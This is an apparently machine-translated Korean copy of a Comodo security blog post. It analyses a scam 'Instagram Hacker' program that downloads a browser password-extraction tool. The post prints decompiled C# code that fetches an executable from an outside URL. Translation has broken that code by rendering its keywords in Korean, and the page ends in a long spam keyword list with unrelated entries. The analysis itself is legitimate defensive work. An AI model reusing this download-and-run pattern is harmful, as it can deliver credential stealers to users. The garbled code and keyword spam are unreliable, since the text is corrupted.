읽기 시간 : 4 분
많은 사람들이 잠재적으로 원치 않는 응용 프로그램 (PUA)을 심각한 위험으로 생각하지 않습니다. 이러한 무모한 태도의 이유는 PUA가 일반적으로 사용자의 동의하에 설치되기 때문입니다. 그러나이 의견은 큰 실수입니다. PUA가 애드웨어 나 스파이웨어와 같은 다른 프로그램을 드라이브별로 다운로드하여 숨길 수 있기 때문은 아닙니다. 생생한 예 아래 코모도 위협 연구소에서 분석 전문가들은 PUA가 훨씬 더 위협적인 무기 일 수 있음을 분명히 보여줍니다.
“Instagram Hacker”라는 소프트웨어를 만나보십시오. 공식 웹 사이트가 있습니다 https://hackinstagram.net/ 인스 타 그램 계정을 해킹 할 것을 약속합니다. 또한 무료로 다운로드하여 설치할 수 있습니다.
설치 후 Instagram 프로필 URL을 입력하고 암호를 입력하라는 메시지가 표시됩니다.
몇 초 후에 결과가 나타납니다.
그러나“비밀번호보기”버튼을 클릭하면 새 창이 나타납니다.
"활성화 코드 받기"버튼을 클릭하면 "구매 페이지"로 리디렉션됩니다.
"활성화 코드"를 구매할 것을 제안하지만… 공중에서 사기 냄새를 맡을 수 있습니까? Instagram 암호를 몇 초 동안 끊을 수있는 소프트웨어는 존재할 수 없습니다. 인스 타 그램 해커는 단순한 것을 제거하는 또 다른 속임수 도구일까요? 그것을 확인하는 가장 좋은 방법은 응용 프로그램 코드를 살펴 보는 것입니다.
코드는 Dotnet Reactor로 보호되지만 de4dot 도구로 디코딩 할 수 있습니다.
이제 애플리케이션이 사기 도구인지 확인할 수 있습니다. 코드의 첫 번째 조각은 진행 데모 표시기를 위조합니다.
그러나 또 다른 것이 더 흥미 롭습니다. 보시다시피, 활성화에 성공한 경우 다운로드 할 수있는 실행 파일이 포함 된 URL이 포함되어 있습니다.
LoadingWindow ()
{
Class2.qDiUy7EzyuIMj ();
this.filename =“view.exe”;
this.uri = 새 Uri (“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent ();
if (File.Exists (this.filename))
{
File.Delete (this.filename);
}
시도
{
WebClient client1 = 새로운 WebClient ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = 새로운 DownloadProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = 새로운 AsyncCompletedEventHandler (this.method_2);
}
따라
{
this.method_0 ();
}
}
}
}
실행 파일을 실행하면 NirSoft의 WebBrowserPassView 응용 프로그램임을 알 수 있습니다.
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView는 웹 브라우저에 저장된 암호를 나타내는 암호 추출 도구 일뿐입니다. 따라서이 소프트웨어가 추출 할 수있는 모든 암호는 Instagram의 암호가 아니라 브라우저에 보관 된 사용자의 암호입니다.
다시 시작하겠습니다. Instagram 해커가하는 일은 NirSoft에서 다른 PUA를 다운로드하고 시작하는 것입니다. 따라서 우리는 사기 도구에 직면하게됩니다. 여기에서 조작적인 심리적 속임수에 주목하십시오. 피해자가 자신이 바람을 피우는 것을 발견하면 경찰은 그 사건에 대해 거의보고하지 않습니다. 이 경우, 그녀는 Instagram을 해킹하려고 고백해야하는데 이는 사이버 범죄를 저지르는 행위입니다.
그러나 그것은 가장자리의 얇은 끝입니다.
가장 위험한 위협은 응용 프로그램의 URL을 대상 컴퓨터에서 실행되는 악성 파일을 사용하여 다른 URL에서 쉽게 변경할 수 있다는 것입니다. 따라서이 PUA와 이러한 맬웨어 유형의 다른 많은 예는 트로이 목마, 백도어, 다양한 "무거운"맬웨어의 대량 확산에 사용될 수 있습니다. 랜섬 등
그리고 이것이 PUA를 정말로 위험한 악성 코드로 받아 들일만한 좋은 이유입니다. 엄청난 사이버 공격의 발판이 될 수 있기 때문입니다.
“오늘 우리는 고려하지 말아야합니다 악성 코드 코모도 위협 연구소의 책임자 인 파 히히 오르한은 말합니다. "어떤 악성 코드 고립 된 공간에 존재하지 않습니다. 오늘날 사이버 범죄자들은 사용자를 공격하기 위해 긴 멀웨어 체인을 구축하고 있으며, PUA는 그러한 킬링 체인의 링크가 될 수 있습니다. 스페이드를 스페이드라고합니다. 예, 이러한 응용 프로그램은 사용자의 승인으로 다운로드 및 실행되지만이 경우 사기로 인해 승인이 왜곡됩니다. 잠재적으로 원치 않는 응용 프로그램이 합법적 인 척하는 것처럼 모든 사람은 위장에 불과하다는 것을 이해해야합니다. 그렇기 때문에 코모도는 고급 기술 보호를 제공 할뿐만 아니라 사이버 공간의 위험한 함정으로부터 사용자를 막으라고 정기적으로 알려줍니다.”
Comodo로 안전하게 라이브하세요!
관련 자료
위키 백과 DDOS 공격
악성 코드 제거
웹 사이트 악성 코드 스캐너
최고의 웹 사이트 보안
워드 프레스 보안
무료 평가판 시작 인스턴트 보안 점수를 무료로 받으십시오
- SEO 기반 콘텐츠 및 PR 배포. 오늘 증폭하십시오.
- 플라토 블록체인. Web3 메타버스 인텔리전스. 지식 증폭. 여기에서 액세스하십시오.
- 출처: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- 할 수 있는
- 소개
- 계정
- 행동
- 활성화
- 후
- AIR
- All
- 와
- 다른
- 어플리케이션
- 어플리케이션
- 승인
- 공격
- 태도
- 백도어
- 기초
- 때문에
- BEST
- 큰
- 블로그
- 흩어져
- 브라우저
- 빌드
- 단추
- 사기
- 전화
- 케이스
- 체인
- 쇠사슬
- 검사
- 명확하게
- 암호
- 커밋
- 동의
- 고려
- 이 포함되어 있습니다
- 사이버 공격
- 사이버 범죄
- 사이버 범죄자
- 위험
- 위험한
- DDoS 공격
- 파괴적인
- 발견
- 말라
- 더블
- 다운로드
- 용이하게
- Edge
- 엔터 버튼
- 등
- 이벤트
- 예
- 예
- 전문가
- 추출물
- 페이스메이크업
- 를
- 입양 부모로서의 귀하의 적합성을 결정하기 위해 미국 이민국에
- Find
- 먼저,
- 사기
- 무료
- 에
- 얻을
- 좋은
- 큰
- 마구 자르기
- 해커
- 머리
- 여기에서 지금 확인해 보세요.
- 방법
- How To
- HTML
- HTTPS
- in
- 사건
- 지시자
- 인스타그램
- 설치
- 즉시
- 흥미있는
- 외딴
- IT
- 실험실
- 진수
- LINK
- 긴
- 보기
- 기계
- 악성 코드
- 맬웨어 공격
- .
- 거대한
- 최대 폭
- 잘못
- 배우기
- 가장
- 이름
- 요구
- 신제품
- 분명한
- 제공
- 공무원
- 공식 웹 사이트
- ONE
- 의견
- 기타
- 자신의
- 비밀번호
- 암호
- 사람들
- PHP
- 플라톤
- 플라톤 데이터 인텔리전스
- 플라토데이터
- 경찰
- 잠재적으로
- 예방
- 프로필
- 프로그램
- 진행
- 약속
- 보호
- 보호
- 제공
- 실현
- 이유
- 무모한
- 규칙적으로
- 보고서
- 연구
- 결과
- 이력서
- 계시
- 구하다
- 달리기
- 스코어 카드
- 초
- 안전해야합니다.
- 보안
- 진지한
- 영상을
- So
- 소프트웨어
- 스페이스 버튼
- 스파이웨어
- 저장
- 성공한
- 이러한
- 받아
- 테크니컬
- XNUMXD덴탈의
- 그들의
- 위협
- 도처에
- 시간
- 에
- 수단
- 트랩
- 회전
- 이해
- 불필요한
- URL
- 사용자
- 사용자
- 보통
- 여러
- 희생자
- 관측
- 웹
- 웹 브라우저
- 웹 사이트
- 의지
- 겠지
- 자신의
- 너의
- 제퍼 넷